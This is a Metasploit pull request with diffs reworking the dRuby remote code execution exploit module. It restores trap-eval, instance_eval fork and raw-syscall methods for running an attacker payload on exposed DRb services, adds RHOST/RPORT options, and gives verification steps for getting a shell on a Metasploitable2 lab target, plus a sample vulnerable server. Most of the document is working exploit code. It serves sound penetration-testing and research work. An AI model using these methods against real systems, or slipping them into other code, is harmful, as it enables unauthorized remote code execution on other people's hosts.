### PR TITLE
resurrect old methods, try all 3, for druby exploit

### DIFF
--- a/lib/msf/ui/console/module_command_dispatcher.rb
+++ b/lib/msf/ui/console/module_command_dispatcher.rb
@@ -209,10 +209,10 @@ module ModuleCommandDispatcher
     end
 
     rhost = instance.datastore['RHOST']
-    rport = nil
+    rport = instance.datastore['RPORT']
     peer = rhost
-    if instance.datastore['rport']
-      rport = instance.rport
+    if rport
+      rport = instance.rport if instance.respond_to?(:rport)
       peer = "#{rhost}:#{rport}"
     end
 

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -41,7 +41,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => 'Mar 23 2011',
       'DefaultTarget' => 0))
 
-
       register_options(
         [
           OptString.new('URI',
@@ -54,6 +53,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def method_trap(p)
     p.send(:trap, 23,
       :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
+    # Decide if this is running on an x86 or x64 target, using the kill(2) syscall
+    begin
+      pid = p.send(:syscall, 20)
+      p.send(:syscall, 37, pid, 23)
+    rescue Errno::EBADF
+      # 64 bit system
+      pid = p.send(:syscall, 39)
+      p.send(:syscall, 62, pid, 23)
+    end
     p.send(:my_eval, payload.encoded)
   end
 

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -41,7 +41,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       register_options(
         [
-          OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]),
+          OptString.new('URI',
+            "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)"),
+          Opt::RHOST(nil, false),
+          Opt::RPORT(8787)
         ])
   end
 
@@ -94,7 +97,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    serveruri = datastore['URI']
+    unless datastore['URI'].blank?
+      serveruri = datastore['URI']
+    else
+      serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}"
+    end
 
     DRb.start_service
     p = DRbObject.new_with_uri(serveruri)

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -8,6 +8,8 @@ require 'drb/drb'
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::FileDropper
+
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Distributed Ruby Remote Code Execution',
@@ -43,26 +45,74 @@ class MetasploitModule < Msf::Exploit::Remote
         ])
   end
 
+  def method_trap(p)
+    p.send(:trap, 23,
+      :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
+    p.send(:my_eval, payload.encoded)
+  end
+
+  def method_instance_eval(p)
+    p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")
+  end
+
+  def method_syscall(p)
+    filename = "." + Rex::Text.rand_text_alphanumeric(16)
+
+    begin
+      # syscall to decide wether it's 64 or 32 bit:
+      # it's getpid on 32bit which will succeed, and writev on 64bit
+      # which will fail due to missing args
+      j = p.send(:syscall, 20)
+      # syscall open
+      i =  p.send(:syscall, 8, filename, 0700)
+      # syscall write
+      p.send(:syscall, 4, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
+      # syscall close
+      p.send(:syscall, 6, i)
+      # syscall fork
+      p.send(:syscall, 2)
+      # syscall execve
+      p.send(:syscall, 11, filename, 0, 0)
+
+    # likely 64bit system
+    rescue Errno::EBADF
+      # syscall creat
+      i = p.send(:syscall,85,filename,0700)
+      # syscall write
+      p.send(:syscall,1,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
+      # syscall close
+      p.send(:syscall,3,i)
+      # syscall fork
+      p.send(:syscall,57)
+      # syscall execve
+      p.send(:syscall,59,filename,0,0)
+    end
+
+    register_file_for_cleanup(filename) if filename
+    #print_status("payload executed from file #{filename}") unless filename.nil?
+    #print_status("make sure to remove that file") unless filename.nil?
+  end
+
   def exploit
     serveruri = datastore['URI']
+
     DRb.start_service
     p = DRbObject.new_with_uri(serveruri)
     class << p
       undef :send
     end
 
-    p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
-    # syscall to decide whether it's 64 or 32 bit:
-    # it's getpid on 32bit which will succeed, and writev on 64bit
-    # which will fail due to missing args
-    begin
-      pid = p.send(:syscall, 20)
-      p.send(:syscall, 37, pid, 23)
-    rescue Errno::EBADF
-      # 64 bit system
-      pid = p.send(:syscall, 39)
-      p.send(:syscall, 62, pid, 23)
+    methods = ["instance_eval", "syscall", "trap"]
+    methods.each do |method|
+      begin
+        print_status("trying to exploit #{method}")
+        send("method_" + method, p)
+        handler(nil)
+        break
+      rescue SecurityError => e
+        print_error("target is not vulnerable to #{method}")
+      end
     end
-    p.send(:my_eval, payload.encoded)
+
   end
 end

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
         handler(nil)
         break
       rescue SecurityError => e
-        print_error("target is not vulnerable to #{method}")
+        print_warning("target is not vulnerable to #{method}")
       end
     end
 

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -62,9 +62,9 @@ class MetasploitModule < Msf::Exploit::Remote
     filename = "." + Rex::Text.rand_text_alphanumeric(16)
 
     begin
-      # syscall to decide wether it's 64 or 32 bit:
-      # it's getpid on 32bit which will succeed, and writev on 64bit
-      # which will fail due to missing args
+      # Decide if this is running on an x86 or x64 target.
+      # This syscall number is getpid on x86, which will succeed,
+      # or writev on x64, which will fail due to missing args.
       j = p.send(:syscall, 20)
       # syscall open
       i =  p.send(:syscall, 8, filename, 0700)
@@ -77,18 +77,18 @@ class MetasploitModule < Msf::Exploit::Remote
       # syscall execve
       p.send(:syscall, 11, filename, 0, 0)
 
-    # likely 64bit system
+    # likely x64
     rescue Errno::EBADF
       # syscall creat
-      i = p.send(:syscall,85,filename,0700)
+      i = p.send(:syscall, 85, filename, 0700)
       # syscall write
-      p.send(:syscall,1,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
+      p.send(:syscall, 1, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
       # syscall close
-      p.send(:syscall,3,i)
+      p.send(:syscall, 3, i)
       # syscall fork
-      p.send(:syscall,57)
+      p.send(:syscall, 57)
       # syscall execve
-      p.send(:syscall,59,filename,0,0)
+      p.send(:syscall, 59, filename, 0, 0)
     end
 
     register_file_for_cleanup(filename) if filename

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -43,8 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       register_options(
         [
-          OptString.new('URI',
-            "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)"),
+          OptString.new('URI', [false, "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)", nil]),
           Opt::RHOST(nil, false),
           Opt::RPORT(8787)
         ])
@@ -110,6 +109,16 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    if !datastore['URI'].blank? && !datastore['RHOST'].blank?
+      print_error("URI and RHOST are specified, unset one")
+      return
+    end
+
+    if datastore['URI'].blank? && datastore['RHOST'].blank?
+      print_error("neither URI nor RHOST are specified, set one")
+      return
+    end
+
     unless datastore['URI'].blank?
       serveruri = datastore['URI']
     else
@@ -130,12 +139,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     methods.each do |method|
       begin
-        print_status("trying to exploit #{method}")
+        print_status("Trying to exploit #{method} method")
         send("method_" + method, p)
         handler(nil)
         break
       rescue SecurityError, DRb::DRbConnError, NoMethodError
-        print_warning("target is not vulnerable to #{method}")
+        print_warning("Target is not vulnerable to #{method} method")
       end
     end
 

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -104,8 +104,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     register_file_for_cleanup(filename) if filename
-    #print_status("payload executed from file #{filename}") unless filename.nil?
-    #print_status("make sure to remove that file") unless filename.nil?
   end
 
   def exploit
@@ -121,6 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     unless datastore['URI'].blank?
       serveruri = datastore['URI']
+      (datastore['RHOST'], datastore['RPORT']) = serveruri.sub(/druby:\/\//i, '').split(':')
     else
       serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}"
     end

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -33,7 +33,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => 'unix',
       'Arch'           => ARCH_CMD,
       'Targets'        => [
-        ['Automatic', {}],
+        ['Automatic', { method: 'auto'}],
+        ['Trap',      { method: 'trap'}],
+        ['Eval',      { method: 'instance_eval'}],
+        ['Syscall',   { method: 'syscall'}],
       ],
       'DisclosureDate' => 'Mar 23 2011',
       'DefaultTarget' => 0))
@@ -76,6 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
       p.send(:syscall, 2)
       # syscall execve
       p.send(:syscall, 11, filename, 0, 0)
+      print_status("attempting x86 execve of #{filename}")
 
     # likely x64
     rescue Errno::EBADF
@@ -89,6 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
       p.send(:syscall, 57)
       # syscall execve
       p.send(:syscall, 59, filename, 0, 0)
+      print_status("attempting x64 execve of #{filename}")
     end
 
     register_file_for_cleanup(filename) if filename
@@ -109,14 +114,19 @@ class MetasploitModule < Msf::Exploit::Remote
       undef :send
     end
 
-    methods = ["instance_eval", "syscall", "trap"]
+    if target[:method] == 'auto'
+      methods = ["instance_eval", "syscall", "trap"]
+    else
+      methods = [target[:method]]
+    end
+
     methods.each do |method|
       begin
         print_status("trying to exploit #{method}")
         send("method_" + method, p)
         handler(nil)
         break
-      rescue SecurityError => e
+      rescue SecurityError, DRb::DRbConnError, NoMethodError
         print_warning("target is not vulnerable to #{method}")
       end
     end


### PR DESCRIPTION
_AleX_ on IRC notes that the druby exploit module crashes drb on Metasploitable2. It appears that the new method did not work on an old target, but the old methods still do.

This brings back the original two exploit methods, and tries all of them until one works against a target.

This also adds regular RHOST/RPORT parameters that will work instead of URI if URI is not already specified.

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/linux/misc/drb_remote_codeexec`
- [x] target a metasploitable2 instance with URI "druby://host:port", or just set RHOST / RPORT
- [x] **Verify** that you get a shell
- [x] **Verify** that newer versions of drb are also exploitable

Sample drb server:
```
#!/usr/bin/env ruby

require 'drb/drb'
URI="druby://0.0.0.0:8787"
class TimeServer
 def get_current_time
   return Time.now
  end
end
FRONT_OBJECT=TimeServer.new
$SAFE = 1 # disable eval() and friends
DRb.start_service(URI, FRONT_OBJECT)
DRb.thread.join
```
put this in a file on an x86 or x64 Linux target, e.g. 'druby_timeserver.rb', and run 'ruby druby_timeserver.rb', and it should be successful up to Ruby 2.4 at least on newer systems.